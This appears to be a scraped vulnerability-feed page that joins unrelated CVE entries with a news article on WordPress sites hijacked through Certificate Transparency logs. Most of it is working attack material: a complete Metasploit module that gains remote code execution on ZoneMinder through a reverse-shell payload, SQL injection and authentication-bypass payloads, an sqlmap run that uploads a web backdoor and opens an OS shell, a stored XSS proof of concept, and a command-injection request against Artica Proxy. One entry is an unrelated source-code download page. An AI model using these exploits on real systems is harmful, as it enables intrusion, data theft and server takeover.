SQL Injection vulnerability in admin/batch_manager.php in piwigo v2.9.5, via the filter_category parameter to admin.php?page=batch_manager.

hi，There is a vulnerability in the admin/batch\_manager.php.  

I didn't find the full trigger request in the browser, so I added the ‘&filter\_category\_use=on’ parameter to the request based on the code.

    POST /admin.php?page=batch_manager HTTP/1.1
    Host: 10.150.10.186:30002
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://10.150.10.186:30002/admin.php?page=batch_manager
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 695
    Cookie: pwg_display_thumbnail=no_display_thumbnail; pwg_id=85b6lvm6f6nqvji17k04ugkdu0
    Connection: close
    Upgrade-Insecure-Requests: 1
    
    start=0&pwg_token=438d258aad10f5b13c74425475163e4e&filter_prefilter_use=on&filter_prefilter=last_import&filter_duplicate
    s_date=on&filter_category=1&tag_mode=AND&filter_level=03&filter_dimension_min_width=145&filter_dimension_max_width=2560&
    filter_dimension_min_height=91&filter_dimension_max_height=1440&filter_dimension_min_ratio=1.29&filter_dimension_max_rat
    io=1.77&filter_search_use=on&q=&filter_filesize_use=on&filter_category_use=on&filter_filesize_min=1.3&filter_filesize_ma
    x=1.3&submitFilter=&selectAction=-1&associate=1&dissociate=1&author=&title=&date_creation=2019-05-08+00%3A00%3A00&level=
    0&regenerateSuccess=0&regenerateError=0

CVE-2020-19217: SQL injection in admin/batch_manager.php · Issue #1012 · Piwigo/Piwigo

Attackers pounce before site owners can activate the installation wizard

Attackers pounce before site owners can activate the installation wizard

Attackers are abusing the Certificate Transparency (CT) system to compromise new WordPress sites in the typically brief window of time before the content management system (CMS) has been configured and therefore secured.

CT is a web security standard for monitoring and auditing TLS (aka SSL) certificates, which are issued by certificate authorities (CAs) to validate websites’ identity.

First implemented by the DigiCert CA in 2013, the standard mandates that CAs immediately record all newly issued certificates on public logs in the interests of transparency and the prompt discovery of rogue or misused certificates.

**DDoS attacks**

However, evidence is growing that malicious hackers are monitoring these logs in order to detect new WordPress domains and configure the CMS themselves after web admins upload the WordPress files, but before they manage to secure the website with a password.

Multiple testimonies have emerged detailing sites being hacked within minutes – within seconds, even – of TLS certificates being requested.

RELATED ‘Dangerous’ EU web authentication plan threatens to undercut browser-led certification system

Domain owners report the appearance of a malicious file (/wp-includes/.query.php) and sites being press-ganged into joining DDoS attacks.

On a related thread on the support forum of Let’s Encrypt, a CA that issues free certificates and launched its own CT log in 2019, a Certbot engineer said the attacks had “been happening for a few years now”.

**Recon techniques**

Josh Aas, executive director at the Internet Security Research Group, which runs Let’s Encrypt, agrees with the engineer’s speculation over the attackers’ reconnaissance techniques.

“If the attacker is polling CT logs directly they would see new certificate entries faster, giving them a larger time window in which to pull off the attack,” Aas told The Daily Swig. Scanning crt.sh, a certificate search domain, “might also work, but it takes longer for new certificates to propagate from CT”.

There’s no question of the attacks reflecting shortcomings in the CT system, which according to Let’s Encrypt has “led to numerous improvements to the CA ecosystem and web security” and “is rapidly becoming critical infrastructure”.

Aas said all publicly trusted CAs are required to submit certificates to CT logs “without delay after they are issued”.

**An argument for automation**

He suggested that the responsibility for protecting new WordPress sites ultimately lies with domain owners and hosting providers.

“Getting a certificate from Let’s Encrypt may make it easier to detect a new installation, but nobody should be putting WordPress installations on the public internet until they are secured. If a hosting provider or any other entity is doing that, please report it as a vulnerability in their deployment process.”

Catch up on the latest WordPress security news

Josepha Haden, executive director on the WordPress project at Automattic, told The Daily Swig that the attacks “only affects direct installations – if a site is on any recommended host, or the installation process is automated, there is usually a pre-configured config file so the installation process is complete/is not interactive and there’s little chance for that attack”.

In a recent blog post on the topic, Colorado-based web design firm White Fir Design suggested that WordPress could tackle the problem by giving the domain owner “control of the website” at the outset, “say, by adding a \[template\] file”.

On the Let’s Encrypt forum, Christopher Cook, developer of Let's Encrypt Windows UI Certify the Web, proposed that WordPress “could randomise the install URL and present it only to you in the console, or require a one-time token”.

Josepha Haden acknowledged that WordPress needed “to review the issue. The Core team is aware and discussing the best changes as well as best timing as we move forward with the rest of our releases for the remainder of the year,” she said.

RECOMMENDED Heroku resets user passwords after concluding April cyber-attack ran deep

WordPress sites getting hacked ‘within seconds’ of TLS certificates being issued

Foxit PDF Reader v11.2.1.53537 was discovered to contain a NULL pointer dereference via the component FoxitPDFReader.exe. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted PHP file.

CVE-2022-27359

This Metasploit module exploits an arbitrary file write in the debug log file option chained with a path traversal in the language settings that leads to remote code execution in ZoneMinder surveillance software versions before 1.36.13 and before 1.37.11

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  prepend Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'ZoneMinder Language Settings Remote Code Execution',        'Description' => %q{          This module exploits arbitrary file write in debug log file option          chained with a path traversal in language settings that leads to a          remote code execution in ZoneMinder surveillance software versions          before 1.36.13 and before 1.37.11        },        'License' => MSF_LICENSE,        'Author' => [ 'krastanoel' ], # Discovery and exploit        'References' => [          [ 'CVE', '2022-29806' ],          [ 'URL', 'https://krastanoel.com/cve/2022-29806']        ],        'Platform' => ['php'],        'Privileged' => false,        'Arch' => ARCH_PHP,        'Targets' => [          [ 'Automatic Target', {}]        ],        'DisclosureDate' => '2022-04-27',        'DefaultTarget' => 0,        'DefaultOptions' => {          'Payload' => 'php/reverse_perl',          'Encoder' => 'php/base64'        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options([      OptString.new('USERNAME', [true, 'The ZoneMinder username', 'admin']),      OptString.new('PASSWORD', [true, 'The ZoneMinder password', 'admin']),      OptString.new('TARGETURI', [true, 'The ZoneMinder path', '/zm/'])    ])  end  def check    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, '/index.php'),      'method' => 'GET'    )    return Exploit::CheckCode::Unknown('No response from the web service') if res.nil?    return Exploit::CheckCode::Safe("Check TARGETURI - unexpected HTTP response code: #{res.code}") if res.code != 200    if res.body =~ /ZoneMinder/      csrf_magic = get_csrf_magic(res)      res = authenticate(csrf_magic) if res.body =~ /ZoneMinder Login/      return Exploit::CheckCode::Safe('Authentication failed') if res.body =~ %r{<title>ZM - Login</title>}      res = send_request_cgi(        'uri' => normalize_uri(target_uri.path, '/index.php'),        'method' => 'GET',        'keep_cookies' => true      )    else      return Exploit::CheckCode::Safe('Target is not a ZoneMinder web server')    end    res.body.match(/v(1.\d+.\d+)/)    version = Regexp.last_match(1)    unless version      return Exploit::CheckCode::Safe('Unable to determine ZoneMinder version')    end    version = Rex::Version.new(version)    return Exploit::CheckCode::Appears("Version Detected: #{version}") if version <= Rex::Version.new('1.37.10')    Exploit::CheckCode::Safe("Version Detected: #{version}")  rescue ::Rex::ConnectionError    return Exploit::CheckCode::Unknown('Could not connect to the web service')  end  def exploit    unless datastore['AutoCheck']      cookie_jar.clear      res = authenticate      fail_with(Failure::NoAccess, 'Authentication failed') if res&.body =~ %r{<title>ZM - Login</title>}    end    vprint_status('Leak installation directory path')    random_path = rand_text_alphanumeric(6..15)    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, '/index.php'),      'method' => 'GET',      'keep_cookies' => true,      'vars_get' => { 'view' => random_path }    )    fail_with(Failure::UnexpectedReply, 'Failed to leak install path') unless res    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, '/index.php'),      'method' => 'GET',      'keep_cookies' => true,      'vars_get' => { 'view' => 'options' }    )    csrf_magic = get_csrf_magic(res)    current_lang = res&.get_html_document&.at(      'select[@name="newConfig[ZM_LANG_DEFAULT]"]        option[@selected="selected"]'    )&.text    fail_with(Failure::UnexpectedReply, 'Unable to get current language') if res.nil? || current_lang.nil?    data = 'view=request&request=log&task=query&limit=10'    data += "&__csrf_magic=#{csrf_magic}" if csrf_magic    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/index.php'),      'data' => data.to_s,      'keep_cookies' => true    )    fail_with(Failure::UnexpectedReply, 'Unable to get valid JSON response') if res.nil? || res&.body.blank?    res.body.match(/(\{"result":.*})/)    request_log = JSON.parse(Regexp.last_match(1)).with_indifferent_access    if request_log.key?(:rows) # Check for latest version key first v1.36.x      request_log_key = 'rows'    elsif request_log.key?(:logs)      request_log_key = 'logs'    else      fail_with(Failure::UnexpectedReply, 'Service found, but unable to find request log key')    end    request_log = request_log[request_log_key].select { |e| e['Message'] =~ /'#{random_path}'/ }.first    if request_log      path = request_log['File'].split('/')[0..-2].join('/')      vprint_good("Path: #{path}")    else      fail_with(Failure::UnexpectedReply, 'Service found, but unable to leak installation directory path')    end    fname = "#{rand_text_alphanumeric(6..15)}.php"    traverse_path = "#{path}/lang".split('/')[1..].map { '../' }.join    shell = "#{traverse_path}tmp/#{fname}"    data = "view=options&tab=logging&action=options&newConfig[ZM_LOG_DEBUG]=1&newConfig[ZM_LOG_DEBUG_FILE]=#{shell}"    data += "&__csrf_magic=#{csrf_magic}" if csrf_magic    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/index.php'),      'data' => data.to_s,      'keep_cookies' => true    )    fail_with(Failure::UnexpectedReply, 'Unable to set LOG_DEBUG_FILE option') if res.nil? || res&.code != 302    vprint_good("Shell: #{shell}")    p = %(<?php #{payload.encoded} ?>)    data = "view=request&request=log&task=create&level=ERR&message=#{p}&file=#{shell}"    data += "&__csrf_magic=#{csrf_magic}" if csrf_magic    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/index.php'),      'data' => data.to_s,      'keep_cookies' => true    )    fail_with(Failure::UnexpectedReply, 'Failed to receive a response') unless res    result = JSON.parse(res.body)['result']    fail_with(Failure::UnexpectedReply, 'Failed to write payload') unless result    fail_with(Failure::UnexpectedReply, 'Unable to write payload to LOG_DEBUG_FILE') if result != 'Ok'    # trigger the shell    lang = shell.gsub(/\.php/, '')    data = "view=options&tab=system&action=options&newConfig[ZM_LANG_DEFAULT]=#{lang}"    data += "&__csrf_magic=#{csrf_magic}" if csrf_magic    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/index.php'),      'data' => data.to_s,      'keep_cookies' => true    )    fail_with(Failure::UnexpectedReply, 'Unable to trigger the payload') if res.nil? || res&.code != 302    # cleanup    data = Rack::Utils.parse_nested_query(data)    data['newConfig']['ZM_LANG_DEFAULT'] = current_lang    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/index.php'),      'data' => data.to_query,      'keep_cookies' => true    )    vprint_warning('Unable to reset language to default') if res.nil? || res&.code != 200    data['tab'] = 'logging'    data['newConfig']['ZM_LOG_DEBUG'] = 0    data['newConfig']['ZM_LOG_DEBUG_FILE'] = ''    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/index.php'),      'data' => data.to_query,      'keep_cookies' => true    )    vprint_warning('Unable to reset debug option') if res.nil? || res&.code != 302  rescue ::Rex::ConnectionError    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")  end  private  def get_csrf_magic(res)    return if res.nil?    res.get_html_document.at('//input[@name="__csrf_magic"]/@value')&.text  end  def authenticate(csrf_magic = nil)    username = datastore['USERNAME']    password = datastore['PASSWORD']    data = "action=login&view=login&username=#{username}&password=#{password}"    data += "&__csrf_magic=#{csrf_magic}" if csrf_magic    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/index.php'),      'data' => data.to_s,      'keep_cookies' => true    })  endend

ZoneMinder Language Settings Remote Code Execution

PHProjekt PhpSimplyGest and MyProjects version 1.3.0 suffer from a cross site scripting vulnerability.

    # Exploit Title: PHProjekt (PhpSimplyGest / MyProjects, 1.3.0) - Stored XSS (Cross-Site Scripting)# Date: 2022-05-05# Exploit Author: Andrea Intilangelo# Vendor Homepage: http://www.phprojekt.altervista.org (removed demo was at http://phprojekt.altervista.org/phpsimplygest130)# Software Link: https://github.com/robyfofo/MyProjects (original PhpSimplyGest https://github.com/robyfofo/PhpSimplyGest now merged/renamed into MyProjects)# Version: 1.3# Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 100.0, Microsoft Edge 101.0.1210.32)# CVE: CVE-2022-27308Description:A stored cross-site scripting (XSS) vulnerability in PHProjekt PhpSimplyGest v1.3.0 (and related products from same vendor, like "MyProjects") allowsattacker to execute arbitrary web scripts or HTML.Injecting persistent javascript code inside the title description (or content) while creating a project, todo, timecard, estimates, report or finding,it will be triggered once page gets loaded.Steps to reproduce:Click on Projects and add or edit an existing one,Insert the following PoC inside the Title   <<SCRIPT>alert("XSS here");//\<</SCRIPT>Click on 'Send'.If a user visits the website dashboard, as well as project summary page, the javascript code will be rendered.Timeline:2022-01-08: Vulnerability discovered.2022-01-08: Vendor contacted.2022-02-09: No reply, vendor contacted for 2nd time.2022-02-18: Request for CVE reservation.2022-04-27: Assigned CVE number 2022-27308.2022-05-02: No reply, vendor contacted for 3rd time.2022-05-05: Public disclosure.PoC Screenshots:https://imagebin.ca/v/6g5OFET1pyZBhttps://imagebin.ca/v/6g6qLRC3X5kyhttps://postimg.cc/qgc19rg0

PHProjekt PhpSimplyGest / MyProjects 1.3.0 Cross Site Scripting

Royal Event Management System v1.0 was discovered to contain a SQL injection vulnerability via the todate parameter.

**Royal Event Management System - 'todate' SQL Injection (Authenticated)**

1.  Description:

Royal Event Management System 1.0 allows SQL Injection via parameter 'todate' in /royal\_event/btndates\_report.php#?= Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

2.  Proof of Concept:

In Burpsuite intercept the request from the affected page with 'todate' parameter and save it like poc.txt. Then run SQLmap to extract the data from the database:

sqlmap -r poc.txt --dbms=mysql

3.  Example payload:

(boolean-based)

\-1%27+OR+1%3d1+OR+%27ns%27%3d%27ns

4.  Burpsuite request:

POST /royal\_event/btndates\_report.php#?= HTTP/1.1  
Host: localhost  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,_/_;q=0.8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-us,en;q=0.5  
Cache-Control: no-cache  
Content-Length: 334  
Content-Type: multipart/form-data; boundary=f289a6438bcc45179bcd3eb7ddc555d0  
Cookie: PHPSESSID=qeoe141g7guakhacf152a3i380  
Referer: http://localhost/royal\_event/btndates\_report.php#?=  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36

\--f289a6438bcc45179bcd3eb7ddc555d0  
Content-Disposition: form-data; name="todate"

\-1' OR 1=1 OR 'ns'='ns  
\--f289a6438bcc45179bcd3eb7ddc555d0  
Content-Disposition: form-data; name="search"

3 --f289a6438bcc45179bcd3eb7ddc555d0  
Content-Disposition: form-data; name="fromdate"

01/01/2011  
\--f289a6438bcc45179bcd3eb7ddc555d0--

CVE-2022-28080: GitHub - erengozaydin/Royal-Event-Management-System-todate-SQL-Injection-Authenticated: CVE-2022-28080

College Management System v1.0 was discovered to contain a SQL injection vulnerability via the course_code parameter.

**Project: College Management System in PHP with source code**

Please scroll down and click on the download button to download the **College Management System In PHP** project for free

The College Management System is a simple project for keeping records of students, teachers, subjects, schedules, and all the college-related things. The project contains the user and admin sides. The admin has to manage all the management like adding students’ or teachers’ details and view their information as per the need. Admin has an important role in the management of this system. This project makes a convenient way for any educational organization to keep records of their students and teachers.

**About System**

This College Management System is in PHP, javascript, and CSS. Talking about the features of this system, it contains the user and Admin section. From here, the admin can view all the records of the enrolled students and registered teachers. Also, you can edit or delete any details as per the requirements.

The design of this project is pretty simple so that the user won’t find any difficulties while working on it. This System in PHP helps in easy management of various records of the students.

**How To Run The Project?**

To run this project, you must have installed a virtual server i.e XAMPP on your PC (for Windows). This College Management System is in PHP with source code is free to download, **Use for educational purposes only!**

_After Starting Apache and MySQL in XAMPP, follow the following steps._

_**1st Step:**_ Extract file  
_**2nd Step:**_ Copy the main project folder  
**_3rd Step:_** Paste in xampp/htdocs/

**_4th Step:_** Open a browser and go to URL “http://localhost/phpmyadmin/”  
_**5th Step:**_ Then, click on the databases tab  
_**6th Step:**_ Create a database naming “imperial\_college” and then click on the import tab  
**_7th Step:_** Click on browse file and select “imperial\_college.sql” file which is inside the “Database” folder  
**_8th Step:_** Click on go.

_**After Creating Database**_,

**_9th Step:_** Open a browser and go to URL “http://localhost/College-Management-System/” For the project demo, you can look at the video below:

**DOWNLOAD COLLEGE MANAGEMENT SYSTEM IN PHP WITH SOURCE CODE: CLICK THE BUTTON BELOW**

  

**Got stuck or need help customizing Student Admission System as per your need, go to our** **PHP tutorial** **or just comment down below and we will do our best to answer your question ASAP.** 

**Post navigation**

CVE-2022-28079: College Management System In PHP With Source Code

Sourcecodester Covid-19 Directory on Vaccination System 1.0 is vulnerable to SQL Injection via cmdcategory.

    # Exploit Title: Covid-19 Directory on Vaccination System 1.0 - SQLi Authentication Bypass# Date: 28/03/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15244/design-and-implementation-covid-19-directory-vacination.html# Version: 1.0# Tested on: XAMPP, Linux1- Go to following url. >> http://localhost/covid-19-vaccination/admin/login.php2- We can login succesfully with SQL bypass method.**** Username = admin ' or "a" or '**** password = anything ###############################################POST /covid-19-vaccination/admin/login.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 63Origin: http://localhostConnection: closeReferer: http://localhost/covid-19-vaccination/admin/login.phpCookie: PHPSESSID=dras0itihsadtdkkkv7gv4hf67Upgrade-Insecure-Requests: 1txtusername=admin+%27+or+%22a%22+or+%27&txtpassword=1&btnlogin=--------------------------# Exploit Title: Covid-19 Directory on Vaccination System 1.0 - 'cmdcategory' SQL Injection# Date: 28/03/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15244/design-and-implementation-covid-19-directory-vacination.html# Version: 1.0# Tested on: XAMPP, LinuxThe Covid-19 Directory on Vaccination System is vulnerable to SQL Injection that leads to Remote Code Execution.Sqlmap command :sqlmap -u 'http://localhost/covid-19-vaccination/hospital.php?cmdcategory=Private' -p cmdcategory --risk=3 --level=5 --threads=10 --keep-alive --os-shell Now you have a web shell uploaded to the server :sqlmap -u 'http://localhost/covid-19-vaccination/hospital.php?cmdcategory=Private' -p cmdcategory --risk=3 --level=5 --threads=10 --keep-alive --os-shell         ___       __H__                                                                                                                                                  ___ ___[,]_____ ___ ___  {1.6.3#stable}                                                                                                                     |_ -| . [.]     | .'| . |                                                                                                                                    |___|_  [,]_|_|_|__,|  _|                                                                                                                                          |_|V...       |_|   https://sqlmap.org                                                                                                                 [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 00:35:27 /2022-03-28/[00:35:31] [INFO] resuming back-end DBMS 'mysql' [00:35:31] [INFO] testing connection to the target URLsqlmap resumed the following injection point(s) from stored session:---Parameter: cmdcategory (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: cmdcategory=Private') AND 3773=3773-- fUxB    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: cmdcategory=Private') AND (SELECT 9765 FROM (SELECT(SLEEP(5)))DnRk)-- LWnB---[00:35:32] [INFO] the back-end DBMS is MySQLweb application technology: PHP 8.1.2, Apache 2.4.52back-end DBMS: MySQL 5 (MariaDB fork)[00:35:32] [INFO] going to use a web backdoor for command prompt[00:35:32] [INFO] fingerprinting the back-end DBMS operating system[00:35:32] [INFO] the back-end DBMS operating system is Linuxwhich web application language does the web server support?[1] ASP[2] ASPX[3] JSP[4] PHP (default)> 4do you want sqlmap to further try to provoke the full path disclosure? [Y/n] n[00:36:09] [WARNING] unable to automatically retrieve the web server document rootwhat do you want to use for writable directory?[1] common location(s) ('/var/www/, /var/www/html, /var/www/htdocs, /usr/local/apache2/htdocs, /usr/local/www/data, /var/apache2/htdocs, /var/www/nginx-default, /srv/www/htdocs, /usr/local/var/www') (default)[2] custom location(s)[3] custom directory list file[4] brute force search> 2please provide a comma separate list of absolute directory paths: /opt/lampp/htdocs/covid-19-vaccination/[00:36:30] [WARNING] unable to automatically parse any web server path[00:36:30] [INFO] trying to upload the file stager on '/opt/lampp/htdocs/covid-19-vaccination/' via LIMIT 'LINES TERMINATED BY' method[00:36:30] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)[00:36:30] [WARNING] if the problem persists please try to lower the number of used threads (option '--threads')[00:36:31] [INFO] the file stager has been successfully uploaded on '/opt/lampp/htdocs/covid-19-vaccination/' - http://localhost:80/covid-19-vaccination/tmpumlrg.php[00:36:31] [WARNING] unable to upload the file through the web file stager to '/opt/lampp/htdocs/covid-19-vaccination/'[00:36:31] [WARNING] backdoor has not been successfully uploaded through the file stager possibly because the user running the web server process has not write privileges over the folder where the user running the DBMS process was able to upload the file stager or because the DBMS and web server sit on different serversdo you want to try the same method used for the file stager? [Y/n] y[00:36:33] [INFO] the backdoor has been successfully uploaded on '/opt/lampp/htdocs/covid-19-vaccination/' - http://localhost:80/covid-19-vaccination/tmpbwipl.php[00:36:33] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTERos-shell>

CVE-2022-28530: Covid-19 Directory On Vaccination System 1.0 SQL Injection ≈ Packet Storm

In LibreHealth EHR 2.0.0, lack of sanitization of the GET parameters formseq and formid in interface\orders\find_order_popup.php leads to multiple cross-site scripting (XSS) vulnerabilities.

GitLab 15.0 is launching on May 22! This version brings many exciting improvements, but also removes deprecated features and introduces **breaking changes** that may impact your workflow. To see what is being deprecated and removed, please visit Breaking changes in 15.0 and Deprecations.

CVE-2022-29940: Tags · LibreHealth / LibreHealth EHR / LibreHealth EHR Base · GitLab

A OS Command Injection vulnerability was discovered in Artica Proxy 4.30.000000. Attackers can execute OS commands in cyrus.events.php with GET param logs and POST param rp.

**Vendor && Product**

www.articatech.com

Artica Web Proxy v4.30.000000

Download: http://www.articatech.com/download.php

**Reproduction**

Login the web account, use this poc

> _Because the execution result is not echoed, we view the result by writing a file_

https://192.168.108.14:9000/cyrus.events.php?logs=  
 ​  
 POST:  
 rp=;id>../1.txt;

access https://192.168.108.14:9000/1.txt, we can see the execution result.

**OS Command Injection Analysis**

The vulnerable file is in ： cyrus.events.php, it receives a parameter logs and execute function logs()

In the function logs(), it receives another parameter rp with POST method, then take them to the file cyrus.php with ?cyrus-events=yes

In cyrus.php, cyrus-events corresponds to cyrus_events() which can execute os command through ;

$cmdline="$grep --binary-files=text -Ei \\"$search\\" /var/log/mail.log|$tail -n $rp  >$logfile 2>&1";  
...  
shell\_exec($cmdline);

Tag

#php